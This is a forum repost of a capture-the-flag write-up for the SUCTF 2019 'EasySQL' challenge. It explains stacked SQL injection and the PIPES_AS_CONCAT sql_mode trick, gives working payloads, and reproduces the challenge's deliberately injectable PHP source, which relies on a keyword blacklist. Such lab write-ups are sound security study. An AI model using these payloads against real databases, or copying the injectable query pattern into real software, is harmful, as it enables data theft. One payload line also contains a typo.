登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
[SUCTF 2019]EasySQL
先输入1,有回显,输入1’,没有回显,
用fuzz跑一下看过滤了哪些关键字
这里过滤了很多,
猜测应该是堆叠注入,先输入:1;show tables; 发现了这个
1,desc
1,show columns
都不行估计关键词过滤掉了。
参考上一题 BUUCTF靶场6 的解题方法。
利用原理:
(1)补充系统变量@sql_mode:是一组mysql支持的基本语法及校验规则
PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似
猜测后台sql语句为:
select 接受的变量 || flag form flag;
payload:
1;set sql_mode=pipes_as_contact;select 1;
//闭合 //设置变量 //拼接sql语句
(2)
[Plain Text] 纯文本查看 复制代码 *,1
//拼接起来的sql语句是 select *,1 || flag from flag;
题后看一下源码:
GitHub上有源码(https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql)
index.php源码
[PHP] 纯文本查看 复制代码
<?php
session_start();
include_once "config.php";
$post = array();
$get = array();
global $MysqlLink;
//GetPara();
$MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
if(!$MysqlLink){
die("Mysql Connect Error!");
}
$selectDB = mysqli_select_db($MysqlLink,$dataName);
if(!$selectDB){
die("Choose Database Error!");
}
foreach ($_POST as $k=>$v){
if(!empty($v)&&is_string($v)){
$post[$k] = trim(addslashes($v));
}
}
foreach ($_GET as $k=>$v){
if(!empty($v)&&is_string($v)){
$get[$k] = trim(addslashes($v));
}
}
//die();
?>
<html>
<head>
</head>
<body>
<a> Give me your flag, I will tell you if the flag is right. </a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>
<?php
if(isset($post['query'])){
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is",$post['query']));
if(preg_match("/{$BlackList}/is",$post['query'])){
//echo $post['query'];
die("Nonono.");
}
if(strlen($post['query'])>40){
die("Too long.");
}
$sql = "select ".$post['query']."||flag from Flag"; //sql执行语句
mysqli_multi_query($MysqlLink,$sql);
do{
if($res = mysqli_store_result($MysqlLink)){
while($row = mysqli_fetch_row($res)){
print_r($row);
}
}
}while(@mysqli_next_result($MysqlLink));
}
?>
这个和强网杯相似,都是堆叠注入,在公开的源码中可以看到,传入的 query 长度不超过 40
关键的查询代码是 select $post['query']||flag from Flag(从源码里面可以看到是post传入)
输入 1 或 0 查询结果如图,要想办法让 || 不是逻辑或
第一种:堆叠注入
使得sql_mode的值为PIPES_AS_CONCAT。
payload:set sql_mode=PIPES_AS_CONCAT;
所以整个语句为:1;set sql_mode=PIPES_AS_CONCAT;select 1
拼接一下就是 select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
(2)根据SQL执行语句:sql="select".post[‘query’]."||flag from Flag";
构造出:$sql=“select *,1 ||flag from Flag”;
所以直接输入“*,1”就可直接出flag
关于非预期解 : *,1
拼接一下,不难理解 : select *,1||flag from Flag
等同于 select *,1 from Flag
————————————————
版权声明:本文为CSDN博主「Dy1n9」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_45890174/article/details/108765245
| 
发表于 2022-9-1 16:18:15
